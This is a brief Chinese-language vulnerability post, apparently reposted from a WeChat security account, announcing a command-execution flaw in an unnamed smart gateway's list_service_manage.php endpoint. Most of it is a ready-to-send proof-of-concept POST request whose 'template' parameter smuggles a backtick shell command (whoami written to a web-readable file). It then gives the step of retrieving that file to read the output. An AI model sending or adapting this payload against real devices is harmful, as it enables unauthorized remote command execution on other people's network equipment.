POC
POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Nradius_submit=true 访问文件url+/tmp/1.txt获取命令回显
原文始发于微信公众号(小白菜安全):漏洞推送|某智能网关 list_service_manage存在命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论